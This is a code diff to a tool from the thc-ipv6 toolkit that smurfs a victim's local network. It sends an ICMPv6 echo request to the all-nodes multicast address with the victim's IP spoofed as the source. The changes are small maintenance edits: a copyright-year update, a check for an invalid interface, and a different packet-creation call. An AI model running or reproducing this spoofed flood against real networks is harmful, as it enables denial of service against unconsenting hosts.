@@ -11,7 +11,7 @@
 #include "thc-ipv6.h"
 
 void help(char *prg) {
-  printf("%s %s (c) 2012 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
   printf("Syntax: %s interface victim-ip\n\n", prg);
   printf("Smurfs the local network of the victim. Note: this depends on an\n");
   printf("implementation error, currently only verified on Linux.\n");
@@ -40,9 +40,13 @@ int main(int argc, char *argv[]) {
   interface = argv[1];
   victim6 = thc_resolve6(argv[2]);
   multicast6 = thc_resolve6("ff02::1");
+  if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
+    fprintf(stderr, "Error: invalid interface %s\n", interface);
+    exit(-1);
+  }
 
   memset(buf, 'A', 16);
-  if ((pkt = thc_create_ipv6(interface, PREFER_GLOBAL, &pkt_len, multicast6, victim6, 0, 0, 0, 0, 0)) == NULL)
+  if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, multicast6, victim6, 0, 0, 0, 0, 0)) == NULL)
     return -1;
   if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
     return -1;
